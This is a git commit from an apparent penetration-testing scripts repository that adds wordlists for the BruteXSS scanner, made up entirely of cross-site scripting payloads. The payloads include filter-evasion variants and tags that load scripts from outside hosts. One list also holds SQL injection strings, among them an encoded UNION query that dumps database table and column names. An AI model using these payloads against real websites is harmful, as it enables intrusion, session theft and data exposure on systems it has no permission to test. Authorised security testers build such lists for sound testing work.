github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Add files via upload

penetration/batch_scan
InformationSecurity 2016-07-16 07:09:26 +08:00 committed by GitHub
parent 80e01472f4
commit 49ccd7eea6
4 changed files with 5831 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5537
BruteXSS/wordlist-huge.txt Normal file
View File

File diff suppressed because it is too large Load Diff

171
BruteXSS/wordlist-medium.txt Normal file
View File

@ -0,0 +1,171 @@
</ScrIpt><script>alert(1)</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<div onclick="alert('xss')">
<div style="color: expression(alert('XSS'))">
<div style="color: '<'; color: expression(alert('XSS'))">
%c1;alert(/xss/);//
"onclick=alert(1)//
"><!-- --><script>alert(xss);<script>
<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>
<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
<script>+alert(88199)</script>
<script>alert(/88199/)</script>
<script src=data:text/javascript,alert(88199)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>
<script>alert(String.fromCharCode(49,49))</script>
<script>alert(/88199/.source)</script>
<script>setTimeout(alert(88199),0)</script>
<script>document['write'](88199);</script>
<anytag onmouseover=alert(15)>
<anytag onclick=alert(16)>
<a onmouseover=alert(17)>
<a onclick=alert(18)>
<a href=javascript:alert(19)>
<button/onclick=alert(20)>
<form><button
formaction=javascript&colon;alert(21)>
<form/action=javascript:alert(22)><input/type=submit>
<form onsubmit=alert(23)><button>
<form onsubmit=alert(23)><button>
<img src=x onerror=alert(24)> 29
<body/onload=alert(25)><body>
onscroll=alert(26)><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<input autofocus>
<iframe src="http://0x.lv/xss.swf"></iframe>
<iframe/onload=alert(document.domain)></iframe>
<IFRAME SRC="javascript:alert(29);"></IFRAME>
<meta http-equiv="refresh" content="0;
url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
<object data="javascript:alert(document.domain)">
<marquee onstart=alert(30)></marquee>
<isindex type=image src=1 onerror=alert(31)>
<isindex action=javascript:alert(32) type=image>
<input onfocus=alert(33) autofocus>
<input onblur=alert(34) autofocus><input autofocus>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm (1);</script>
<a href=“http://www.google.com">Clickme</a>
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
<a href=”javascript:alert(1)”>Clickme</a>
<body/onhashchange=alert(1)><a href=#>clickit
<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>
<iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<embed/src=//goo.gl/nlX0P>
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image
<span class="pln"> </span><span class="tag">&lt;formaction</span><span class="pun">=</span><span class="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class="tag">&gt;&lt;button&gt;</span><span class="pln">CLICK</span>
<isindexformaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<q/oncut=open()>
<q/oncut=alert(1)>
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbsonload=alert-1 // Works with IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;
<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>
<style>#test{x:expression(alert(/XSS/))}</style>
<a onmouseover=location=javascript:alert(1)>click
<body onfocus="location=&#039;javascrpt:alert(1) >123
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<svg><script>alert&#40/1/&#41</script>
<svg><script>alert&#40 1&#41
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
<input value="XSStest" type=text>
"><imgsrc=x onerror=prompt(0);>
" autofocusonfocus=alert(1)
" onmouseover="prompt(0) x="
" onfocusin=alert(1) autofocus x="
" onfocusout=alert(1) autofocus x="
" onblur=alert(1) autofocus a="
";alert(1)
";document.body.addEventListener("DOMActivate",alert(1))
";document.body.addEventListener("DOMActivate",prompt(1))
";document.body.addEventListener("DOMActivate",confirm(1))
<a href=”Userinput”>Click</a>
<a href=”javascript:alert(1)//”>Click</a>
javascript&#058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
avascript&#x3A;alert&lpar;document&period;cookie&rpar;
vbscript:alert(1);
vbscript&#058;alert(1);
vbscr&Tab;ipt:alert(1)"
encodeURIComponent(&#039;userinput&#039;)
-alert(1)-
-prompt(1)-
-confirm(1)-
encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)
<svg><script>varmyvar=”YourInput”;</script></svg>
www.site.com/test.php?var=text”;alert(1)//
<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
src=x onerror=prompt(0);
???script?alert(1)?/script?
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<// style=x:expression\28write(1)\29>
<!--[if]><script>alert(1)</script -->
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<%div%20style=xss:expression(prompt(1))>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec
<iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//&#039;
name="javascript:alert("XSS")"></iframe>
<script> vari=location.hash; document.write(i); </script>
<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()
<scri%00pt>confirm(0);</scri%00pt>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>

98
BruteXSS/wordlist-small.txt Normal file
View File

@ -0,0 +1,98 @@
<script>alert(1)</script>
<scRipt>alErt(1)</scrIpt>
<img src=x onerror=alert(1)>
<script type=vbscript>MsgBox(0)</script>
a'or 2=2--
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<BODY ONLOAD=alert("XSS")>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>
<IMG SRC=" javascript:alert("XSS");">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert("XSS")">
<IMG DYNSRC="javascript:alert("XSS")">
<INPUT TYPE="image" DYNSRC="javascript:alert("XSS");">
<BGSOUND SRC="javascript:alert("XSS");">
<br size="&{alert("XSS")}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<IFRAME SRC=javascript:alert("XSS")></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="behaviour: url("http://xss.ha.ckers.org/exploit.htc");">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMG STYLE="xss: expre\ssion(alert("XSS"))">
<STYLE TYPE="text/javascript">alert("XSS");</STYLE>
<XML SRC="javascript:alert("XSS");">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
<A HREF=ht://www.google.com/>link</A>
<A HREF=http://google.com/>link</A>
<A HREF=http://www.google.com./>link</A>
<A HREF="javascript:document.location="http://www.google.com/"">link</A>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
<BASE HREF="javascript:alert("XSS");//">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=# onmouseover="alert("xxs")">
<IMG SRC= onmouseover="alert("xxs")">
<IMG onmouseover="alert("xxs")">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="javascript:alert("XSS");">
<IMG SRC="jav&#x09;ascript:alert("XSS");">
<IMG SRC="jav&#x0A;ascript:alert("XSS");">
<IMG SRC="jav&#x0D;ascript:alert("XSS");">
<IMG SRC=" &#14; javascript:alert("XSS");">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert("XSS")"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert("XSS");//
</script><script>alert("XSS");</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
/*!00000concat*/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
<object%00something allowScriptAccess=always data=//0me.me/demo/xss/flash/normalEmbededXSS.swf?
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
1 AND (select DCount(last(username)&after=1&after=1) from users where username=ad1min)
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>

25
BruteXSS/wordlist.txt Normal file
View File

@ -0,0 +1,25 @@
</script>"><script>prompt(1)</script>
</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>